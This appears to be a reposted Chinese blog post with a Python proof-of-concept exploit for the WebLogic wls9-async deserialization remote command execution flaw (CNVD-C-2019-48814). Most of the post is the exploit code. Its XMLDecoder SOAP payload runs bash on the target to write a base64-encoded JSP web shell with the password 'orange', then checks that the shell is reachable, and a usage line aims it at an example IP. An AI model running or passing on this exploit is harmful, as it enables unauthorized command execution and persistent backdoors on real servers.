CNVD-C-2019-48814 漏洞

CNVD-C-2019-48814

WebLogic wls9-async反序列化远程命令执行漏洞

 

网上均有详细的说明(https://github.com/jas502n/CNVD-C-2019-48814)

(https://github.com/SkyBlueEternal/CNVD-C-2019-48814-or-CNNVD-201904-961)

利用payload 写个 POC 。

利用:url+_async/AsyncResponseService ,判断状态,POST payload  判断是否成功get shell 。

import requests
import sys
def poc():
    url =str(sys.argv[1])
    path ="/_async/AsyncResponseService"
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36",
        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        'Content-Type': "text/xml"
        }
    payload = """
    <?xml version="1.0" encoding="Utf-8"?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
    <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java version="1.8.0_131" class="java.beans.xmlDecoder">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>bash</string>
    </void>
    <void index="1">
    <string>-c</string>
    </void>
    <void index="2">
    <string>echo Jmx0OyUNCiAgICAgICAgamF2YS5pby5JbnB1dFN0cmVhbSBpbiA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoIm9yYW5nZSIpKS5nZXRJbnB1dFN0cmVhbSgpOw0KICAgICAgICBpbnQgYSA9IC0xOyAgICAgICAgICANCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgDQogICAgICAgIG91dC5wcmludCgiJmx0O3ByZSZndDsiKTsgICAgICAgICAgDQogICAgICAgIHdoaWxlKChhPWluLnJlYWQoYikpIT0tMSl7DQogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgb3V0LnByaW50KCImbHQ7L3ByZSZndDsiKTsNCiUmZ3Q7DQo=|base64 -d >servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string>
    </void>
    </array>
    <void method="start"/>
    </void>
    </java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body>
    <asy:onAsyncDelivery/>
    </soapenv:Body>
    </soapenv:Envelope>
    """
    try:
        request = requests.post(url+path,data=payload,headers=headers)
        print '[+] exploit url: %s_async/AsyncResponseService' % url
        if request.status_code == 202:
            print '[+] %s  exploit success!' % url
            request2 = requests.get(url+'/_async/shell.jsp')
            if request2.status_code == 200:
                print '[+]   get shell: %s/_async/shell.jsp  pass is orange ' % url
            else:
                print '[-]   get shell fail '
        else:
            print '[-] %s  exploit faile' % url
    except:
        print '[-] %s  address cannot connect' % url
if __name__=='__main__':
    poc()

攻击:

python CNVD-C-2019-48814.py http://111.111.111.111:7001/

攻击成功之后,可以获得一个shell GET 密码是orange 

 

测试失败。

转载于:https://www.cnblogs.com/Oran9e/p/10772713.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值